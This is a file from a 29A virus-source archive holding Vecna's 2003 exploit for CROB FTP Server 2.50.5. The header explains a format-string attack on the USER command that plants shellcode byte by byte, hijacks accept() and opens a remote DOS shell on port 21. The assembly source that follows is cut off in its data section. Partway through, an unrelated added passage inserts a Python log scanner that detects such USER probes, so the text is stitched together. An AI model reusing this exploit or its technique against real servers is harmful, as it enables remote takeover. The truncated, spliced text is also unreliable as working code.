29a-7.014

Virus source code collected from 29A

;CROB FTP SERVER 2.50.5 BUILD 238 EXPLOIT
;(c) Vecna 2003 - http://coderz.net/vecna - http://29a.host.sk
;
;f3ar the 7 dd exploitz!
;(you can lose 15 pounds in 7 days!! ask me how!)
;
;This is my first exploit using format strings, and it's for w9x (well, I tested
;it only in w98, but it probably works in w95 too). The printf() implementation in
;use was not as flexible as the unix ones, or even the w2k one, so I had to
;resort to some 'ugly' things to make it work.
;
;The first step in the exploit was to build the shellcode in the remote server,
;using the format string bug that existed in the USER command (USER %x%x).
;I did this by connecting, sending a bugged USER string that wrote one byte of my
;shellcode, and disconnecting: once for each byte of our shellcode. Because of the
;limitations of the printf() implementation, we had to write one byte per USER
;string (except in very rare cases). Moreover, I could only send 2 bugged USER strings
;per connection before the server started to act weird. So I resolved to write one
;byte per connection. Our shellcode has, in two places, unused areas, which sit
;where the address would contain zeros. When generating the format
;string, we take care of cases where the address contains the '%' byte.
;
;The second step was to choose something to overwrite. I did this using a single
;bugged USER line, becoz of the very special address I chose for the shellcode:
;10080601h. As we have to write 01h, 06h, 08h and then 10h to form the address,
;the increasing order of its bytes allowed us to write it with a single line (the
;printf() implementation limits the size of the string to a few more than 500).
;
;The overwritten address is a pointer to accept(). This allows bypassing any kind
;of firewall that may be installed on the server machine, as all the socket
;setup is done by the vulnerable server, and it surely has access to port 21,
;that's where we listen for remote DOS shells. :)
;
;When a connection is received, we restore the overwritten pointer, call the
;original accept(), create a new thread to create the DOS shell, and return
;an error to the server. This new thread creates the pipes, gets the command
;interpreter name from the environment, and spawns a shell, redirecting output
;and input to the socket we created first. It's done. The server will continue
;to work after being exploited, and the first one to connect to port 21 after the
;exploit will gain a useful w9x remote shell :P
;
;greetz to Luca Ercoli, that found the bug.
;
;compile with:
;tasm32 /m /ml crobftp.asm
;tlink32 crobftp.obj,,,import32
;
;the includes, before you ask, are the ones from z0mbie, jacky qwerty, and
;others, which you should obtain from the 29A e-zines, or figure out what they contain.
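As a defensive counterpart to the technique described in the header above, the following is an added example (not part of Vecna's exploit or the 29A file): it scans FTP command-log lines for USER arguments carrying printf-style directives and flags clients that repeat them across connections, the one-byte-per-connection pattern the header describes. The log format, the sample lines and the threshold are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# printf-style directives that have no business in an FTP user name.
# %n is the write primitive a format-string attack depends on; %x/%p
# are the read primitives used to probe the stack.
FMT_SPEC = re.compile(r"%[-+ 0#]*\d*(?:\.\d+)?[hlL]?[diouxXeEfgGcspn]")

# Constructed sample log (assumed format): "<client-ip> <command> <argument>".
SAMPLE_LOG = """\
10.0.0.5 USER alice
10.0.0.5 PASS ******
192.0.2.7 USER %x%x%x%x
192.0.2.7 USER %08x%n
192.0.2.7 USER %x%x%x%x
203.0.113.9 USER bob%40example.com
"""

def parse_line(line):
    """Split one constructed log line into (ip, command, argument)."""
    parts = line.split(" ", 2)
    if len(parts) < 2:
        return None
    ip, cmd = parts[0], parts[1].upper()
    arg = parts[2] if len(parts) == 3 else ""
    return ip, cmd, arg

def suspicious_user(arg):
    """True when a USER argument contains a printf-style directive."""
    return bool(FMT_SPEC.search(arg))

def scan(log_text, threshold=2):
    """Count, per client, USER commands that carry format directives and
    return (counts, clients at or above threshold). A single hit can be
    noise (e.g. a percent-encoded '@' in bob%40example.com matches '%40e'),
    so the repeated-connection pattern is what gets flagged."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, cmd, arg = rec
        if cmd == "USER" and suspicious_user(arg):
            counts[ip] += 1
    flagged = {ip for ip, n in counts.items() if n >= threshold}
    return dict(counts), flagged
```

Running `scan(SAMPLE_LOG)` flags only 192.0.2.7; the percent-encoded username stays below the threshold, which is the caveat to tune against your own FTP traffic.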



.586p
.model flat
locals

REMOTE_BASE EQU 10080600h               ;here we write our code...
ACCEPT_ADDR EQU 5F4D2090h               ;here we write our start address...
NULL_ADDR   EQU 10080538h               ;and there we write garbage
API_ADDR    EQU 1008050Ch               ;here we put our API addresses

@CREATEPROCESS EQU 1008050Ch
@CREATEPIPE    EQU 10080510h
@GETENVVAR     EQU 10080514h
@PEEKNAMEDPIPE EQU 10080518h
@READFILE      EQU 1008051Ch
@WRITEFILE     EQU 10080520h
@CREATETHREAD  EQU 10080524h
@SELECT        EQU 10080528h
@RECV          EQU 1008052Ch
@SEND          EQU 10080530h
@ACCEPT        EQU 10080534h

__WSOCK32          EQU 00503A2Ch
__KERNEL32         EQU 0059AF6Ch
__GetProcAddress   EQU 0059AF5Ch
__GetModuleHandleA EQU 0059AF60h

apicall macro addy
       db 0ffh,015h
       dd addy
endm



.xlist
include header.inc
include socket.inc
include consts.inc
.list


.data

copyright db "CROB FTP SERVER 2.50.5 BUILD 238 EXPLOIT",13,10
          db "(c) Vecna 2003 - http://coderz.net/vecna - http://29a.host.sk",13,10,0
completed db "Done! A DOS prompt should be waiting for you in port 21...",13,10,13,10,0
usage     db "USAGE: CROBFTP.EXE <server>",13,10,0

msg1      db "
